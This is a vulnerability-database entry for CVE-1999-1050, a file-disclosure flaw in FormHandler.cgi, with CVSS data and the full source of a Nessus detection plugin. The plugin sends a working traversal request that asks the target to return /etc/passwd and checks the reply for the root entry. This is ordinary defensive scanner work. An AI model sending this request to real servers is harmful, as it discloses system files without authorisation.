Vulnerabilities > CVE-1999-1050 - Unspecified vulnerability in Matt Wright Formhandler.Cgi 1.0/2.0/3.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
matt-wright
nessus
exploit available

Summary

Directory traversal vulnerability in Matt Wright FormHandler.cgi script allows remote attackers to read arbitrary files via (1) a .. (dot dot) in the reply_message_attach attachment parameter, or (2) by specifying the filename as a template.

Exploit-Db

description: Matt Wright FormHandler.cgi 2.0 Reply Attachment Vulnerability. CVE-1999-1050. Remote exploit for unix platform
id: EDB-ID:19620
last seen: 2016-02-02
modified: 1999-11-16
published: 1999-11-16
reporter: m4rcyS
source: https://www.exploit-db.com/download/19620/
title: Matt Wright FormHandler.cgi 2.0 Reply Attachment Vulnerability

Nessus

NASL family: CGI abuses
NASL id: FORMHANDLER.NASL
description: The
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10075
published: 1999-12-13
reporter: This script is Copyright (C) 1999-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/10075
title: Matt Wright FormHandler.cgi Arbitrary File Access
code:
#
# (C) Tenable Network Security, Inc.
#
# Nessus plugin 10075: detects Matt Wright FormHandler.cgi installations
# that disclose local files (CVE-1999-1050 / BID 799). The detection code
# further down requests a well-known file through the reply-message
# template parameter and matches the shape of the response.

include("compat.inc");

# Registration pass. When the engine loads the plugin with `description`
# set, only the metadata below is recorded and the script exits before any
# network traffic is generated.
if(description)
{
  script_id(10075);
  script_version ("1.41");
  script_cvs_date("Date: 2019/05/29 10:47:07");

  script_cve_id("CVE-1999-1050");
  script_bugtraq_id(799);

  script_name(english:"Matt Wright FormHandler.cgi Arbitrary File Access");
  script_summary(english:"Attempts to read /etc/passwd.");
 
  script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host is affected by an information
disclosure vulnerability." );
  script_set_attribute(attribute:"description", value:
"The 'FormHandler.cgi' CGI application installed on the remote host is
affected by an information disclosure vulnerability that lets anyone
read arbitrary files with the privileges of the web server. An
unauthenticated, remote attacker can exploit this to disclose
sensitive information, which could be used to facilitate further
attacks.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/166");
  # No fixed version is referenced anywhere in this plugin; the only
  # remediation offered is removal of the CGI.
  script_set_attribute(attribute:"solution", value:
"Remove FormHandler.cgi from the web server.");
  # CVSS2 AV:N/AC:L/Au:N/C:P/I:N/A:N matches the 5.0 MEDIUM score on the CVE:
  # remote, unauthenticated, confidentiality-only impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:U/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-1999-1050");

  script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/11");
  script_set_attribute(attribute:"plugin_publication_date", value: "1999/12/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_ATTACK: this plugin actively sends a request that tries to retrieve
  # data from the target (see script_summary above), not a passive check.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 1999-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # http_version.nasl populates the HTTP port information consumed by
  # get_http_port(); smtp_settings.nasl supplies the third-party domain used
  # for the e-mail fields in the request.
  script_dependencie("http_version.nasl", "smtp_settings.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}

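#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

# The e-mail addresses and redirect target in the form are built from the
# scanner's configured third-party domain so no real mailbox receives the
# reply; fall back to the reserved example.com when it is unset.
domain = get_kb_item("Settings/third_party_domain");
if(!domain) domain = "example.com";

url = '/FormHandler.cgi';
header = make_array("Content-type", "application/x-www-form-urlencoded");

# A vulnerable FormHandler.cgi accepts an arbitrary path as the reply
# message template and echoes the file back. /etc/passwd is requested only
# because its root entry has a recognizable shape for the match below.
postdata = string(
  "realname=", SCRIPT_NAME, "&",
  "email=aaa&",
  "reply_message_template=%2Fetc%2Fpasswd&",
  "reply_message_from=nessus%40", domain, "&",
  "redirect=http%3A%2F%2Fwww.", domain, "&",
  "recipient=nessus%40", domain
);
res = http_send_recv3(
  method:"POST",
  item:url,
  port:port,
  add_headers:header,
  data:postdata
);
if (isnull(res)) exit(1, "The server on port "+port+" didn't respond.");

# res[2] holds the response body. It can be NULL on an empty reply, so it
# is guarded before matching. Only the shape of the root passwd entry is
# tested; the body itself is never stored or reported, so the plugin output
# does not carry the disclosed file contents.
body = res[2];
if (!isnull(body) && egrep(pattern:"root:.*:0:[01]:.*", string:body))
{
  security_warning(port:port);
  exit(0);
}

# Record an explicit reason for the clean result instead of ending silently,
# so the scan audit trail shows the check ran and what it concluded.
exit(0, "The web server on port "+port+" does not appear to be affected.");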